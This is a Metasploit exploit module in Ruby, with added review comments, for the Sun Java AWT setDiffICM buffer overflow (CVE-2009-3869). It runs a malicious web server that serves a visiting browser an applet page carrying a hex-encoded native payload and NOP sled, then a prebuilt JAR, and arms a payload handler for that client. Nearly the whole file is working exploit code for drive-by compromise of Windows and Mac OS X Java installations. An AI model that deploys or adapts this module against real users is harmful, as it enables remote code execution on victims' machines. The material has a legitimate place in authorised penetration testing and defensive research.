Path: blob/master/modules/exploits/multi/browser/java_setdifficm_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Browser exploit module for CVE-2009-3869 (Sun Java AWT setDiffICM).
#
# Flow, as implemented below: the HTTP server first answers a non-.jar
# request with a small HTML page that embeds an applet tag, then serves a
# prebuilt JAR (read from the framework data directory in #exploit) when
# the browser requests the randomly named archive.  The encoded native
# payload is not inside the JAR; it is hex-encoded into the applet's
# PARAM tags by #generate_html.
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
      'Description'    => %q{
          This module exploits a flaw in the setDiffICM function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'jduck'
        ],
      'References'     =>
        [
          [ 'CVE', '2009-3869' ],
          [ 'OSVDB', '59710' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-078' ]
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => '',
          # Framework nop generation is off; #generate_html supplies its own
          # fixed four-byte sled via the 'np' PARAM instead.
          'DisableNops' => true,
        },
      'Platform'       => %w{ win osx },
      # NOTE(review): #on_request_uri indexes self.targets[1..3] as
      # Windows / OS X PPC / OS X x86.  That numbering assumes the
      # commented-out 'Automatic' entry below occupies index 0; with the
      # list as it stands the indices are shifted by one.  The branch is
      # currently unreachable because no target name matches /Automatic/.
      'Targets'        =>
        [
=begin

  No automatic targetting for now ...

          [ 'J2SE 1.6_16 Automatic',
            {
              'Platform' => %w{ linux osx win },
              'Arch' => [ARCH_X86, ARCH_PPC]
            }
          ],
=end
          [ 'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-11-04'
    ))
  end


  #
  # HTTP request handler.
  #
  # cli - the connected client (its peerhost keys the target cache)
  # req - the parsed request (uri and headers are read)
  #
  # Requests whose path does not end in ".jar" get either a redirect (when
  # the path lacks a trailing "/") or the applet-loading HTML.  Requests for
  # the JAR get the archive bytes loaded by #exploit, followed by a call to
  # handler() so the payload handler is armed for that client.
  #
  def on_request_uri(cli, req)

    # Create a cached mapping between IP and detected target
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    # Last-seen timestamp (epoch seconds); drives the 60s expiry below.
    @targetcache[cli.peerhost][:update] = Time.now.to_i

    # User-Agent based target selection; only reached for a target whose
    # name matches /Automatic/, and none is defined at present.
    if (target.name =~ /Automatic/)
      case req.headers['User-Agent']
      when /Windows/i
        print_status("Choosing a Windows target")
        @targetcache[cli.peerhost][:target] = self.targets[1]
      when /PPC Mac OS X/i
        print_status("Choosing a Mac OS X PPC target")
        @targetcache[cli.peerhost][:target] = self.targets[2]
      when /Intel Mac OS X/i
        print_status("Choosing a Mac OS X x86 target")
        @targetcache[cli.peerhost][:target] = self.targets[3]
      else
        print_status("Unknown target for: #{req.headers['User-Agent']}")
      end
    end

    # Clean the cache
    # Addresses are collected first and deleted afterwards so the hash is
    # not mutated while it is being iterated.  Entries expire 60 seconds
    # after their last :update.
    rmq = []
    @targetcache.each_key do |addr|
      if (Time.now.to_i > @targetcache[addr][:update]+60)
        rmq.push addr
      end
    end

    rmq.each {|addr| @targetcache.delete(addr) }


    # Request processing
    # NOTE(review): "$" matches before a newline, so these are line anchors,
    # not end-of-string anchors; "\z" is the strict form.  Harmless here
    # since req.uri is compared only for routing, but worth knowing.
    if (not req.uri.match(/\.jar$/i))

      # Redirect to the base directory so the applet code loads...
      if (not req.uri.match(/\/$/))
        print_status("Sending redirect so path ends with / ...")
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      # Display the applet loading HTML
      send_response_html(cli, generate_html(payload.encoded),
        {
          'Content-Type' => 'text/html',
          'Pragma'       => 'no-cache'
        })
      return
    end

    # Send the actual applet over
    print_status("Sending applet")
    send_response(cli, generate_applet(cli, req),
      {
        'Content-Type' => 'application/octet-stream',
        'Pragma'       => 'no-cache'
      })

    # Handle the payload
    handler(cli)
  end


  #
  # Builds the HTML page that embeds the applet.
  #
  # pl - the encoded payload bytes (payload.encoded from the caller)
  #
  # Returns the page as a String.  Three placeholders are substituted:
  #   JARNAME - a random 32-character alphanumeric archive name + ".jar"
  #             (so every response references a different JAR path)
  #   SCODE   - the payload, padded to a multiple of 4 bytes, hex-encoded
  #   NOPS    - a fixed four-byte 0x90 sled, hex-encoded
  #
  def generate_html(pl)

    html = <<-EOF
<html>
<head>
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
EOF
    # finalize html
    jar_name = rand_text_alphanumeric(32)+".jar"
    html.gsub!(/JARNAME/, jar_name)

    # put payload into html
    # debug_payload is a compile-time switch: when true a leading 0xcc byte
    # (x86 int3) is prepended and a hex dump of the buffer is printed.
    debug_payload = false
    pload = ""
    pload << "\xcc" if debug_payload
    pload << pl
    # Pad with random bytes so the buffer length is 4-byte aligned.
    if ((pload.length % 4) > 0)
      pload << rand_text((4 - (pload.length % 4)))
    end
    if debug_payload
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    # put nops into html
    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
    #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

    return html

  end


  #
  # Loads the prebuilt applet JAR from the framework data directory into
  # @jar_data once, then defers to the HttpServer mixin to start serving.
  #
  # NOTE(review): the descriptor is closed by hand, so it leaks if read()
  # raises.  File.binread(path) (or the block form of File.open) would be
  # equivalent and exception-safe.
  #
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3869.jar")
    fd = File.open(path, "rb")
    @jar_data = fd.read(fd.stat.size)
    fd.close

    super
  end


  #
  # Returns the JAR bytes for a ".jar" request.
  #
  # cli - the connected client (used to look up the target cache)
  # req - the request; not read by this method
  #
  # For an /Automatic/ target, returns '' when no target has been cached
  # for cli.peerhost.  Otherwise returns @jar_data loaded in #exploit.
  # this_target is assigned but never used: the same archive is served for
  # every target.
  #
  def generate_applet(cli, req)

    this_target = nil
    if (target.name =~ /Automatic/)
      if (@targetcache[cli.peerhost][:target])
        this_target = @targetcache[cli.peerhost][:target]
      else
        return ''
      end
    else
      this_target = target
    end

    return @jar_data
  end
end